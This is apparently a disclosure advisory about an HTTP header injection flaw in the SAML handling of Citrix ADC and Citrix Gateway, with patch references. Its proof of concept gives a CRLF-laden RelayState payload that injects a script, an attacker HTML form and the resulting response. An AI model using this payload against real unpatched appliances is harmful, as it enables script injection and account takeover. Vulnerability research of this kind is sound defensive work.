HTTP Header Injection in Citrix ADC and Citrix Gateway (CVE-2020-8300, CVE-2021-22927)

We have discovered a vulnerability in Citrix products (Citrix ADC and Citrix Gateway) that allows an attacker to conduct header injection attacks. This would have allowed an attacker to inject arbitrary JavaScript code on a website (similar to Cross-Site Scripting)

Introduction

Citrix ADC, an application delivery controller, as well as Citrix Gateway, a workspace access solution were susceptible to a header injection attack if configured as SAML Service Provider (SP) or SAML Identity Provider (IdP).

An attacker was able to provide a victim with a manipulated link, which, when opened, would execute malicious JavaScript code, thus taking over the victim’s account.

Certitude responsibly disclosed this vulnerability to Citrix in December 2020. A patch release addresses this issue. Note that besides applying the patch, additional configuration steps are required to mitigate this vulnerability:

https://support.citrix.com/article/CTX316577

Vulnerability Overview

Citrix ADC and Citrix Gateway can be configured to act as a SAML Service Provider (SP). A vulnerability was identified in the SAML SP functionality, that allows an attacker to inject newline characters (CR-LF) into an HTTP response issued by the appliance. An attacker could abuse this behavior to e.g. execute JavaScript code in a victim’s browser on protected pages.

Proof of Concept

An unaltered authentication sequence using SAML works as follows:

  1. The user accesses a protected page (e.g. https://example.com/protected).
  2. The appliance redirects the user to the SAML Identity Provider (IdP). A parameter SAMLRequest as well as a parameter RelayState are passed to the IdP.
  3. The user authenticates on the IdP. Typically, if the user is already authenticated, no authentication is required (single sign on).
  4. The IdP redirects the user back to application and passes a SAMLResponse as well as the RelayState parameter received from the appliance.
  5. The appliance verifies the SAMLResponse and redirects the user back to the protected page (https://example.com/protected).

The protected page the user tries to access is recorded in the RelayState parameter. The content of an example RelayState value, when base64 decoded is as follows (\0 represents a NUL-byte):

ns_policy=policy\0https://example.com/protected

During step 5 of the authentication process, the appliance decodes the RelayState parameter and passes the contained URL to the Location-header in the redirecting HTTP response. As there are no authenticity/integrity checks on the RelayState parameter, an attacker can arbitrarily modify this URL. Due to lack of proper encoding, newline characters (CR,LF) contained in the URL allow for HTTP header injection.

An attacker could employ the following scenario:

  1. The attacker accesses the protected page to retrieve a valid SAMLRequest.
  2. The attacker lures a victim, that is logged in on the IdP, on an attacker-controlled page.
  3. The page redirects the victim to the IdP using an HTML form:
<form action="https://idp.example.com/sso" method="POST">
 <input type="hidden" name="SAMLRequest" 
    value="<valid SAML Request from step #1>" />
 <input type="hidden" name="RelayState" 
    value="<manipulated RelayState>" />
 <input type="submit" value="Submit request" />
</form>
  1. After checking that the user is already authenticated, the IdP redirects the browser back to the appliance.
  2. The appliance issues an HTTP redirect containing the manipulated URL in the Location-header.

An attacker could e.g. choose to encode the following URL into the manipulated RelayState parameter (\r represents a CR-byte, \n represents a LF-byte):

\r\nContent-Type: text/html\r\n\r\n<script>alert(1)<script>

The appliance would e.g. issue the following HTTP response:

HTTP/1.1 302 Object Moved
Location:
Content-Type: text/html

<script>alert(1)<script>

This would cause e.g. Google Chrome to execute the attacker-provided script. Other approaches may be required for other browsers.

Resolution

Citrix issued advisories urging affected organizations to upgrade to a version unaffected by this vulnerability. The issue was resolved with two separate patches, having separate CVE identifiers:

https://support.citrix.com/article/CTX297155 (CVE-2020-8300)
https://support.citrix.com/article/CTX319135 (CVE-2021-22927)

Moreover, additional configuration steps are required to mitigate this issue:

https://support.citrix.com/article/CTX316577

References

https://certitude.consulting/advisories/CSA_2021_004_HTTP_Header_Injection_in_Citrix_ADC_and_Citrix_Gateway.md.txt
https://support.citrix.com/article/CTX316577
https://support.citrix.com/article/CTX297155
https://support.citrix.com/article/CTX319135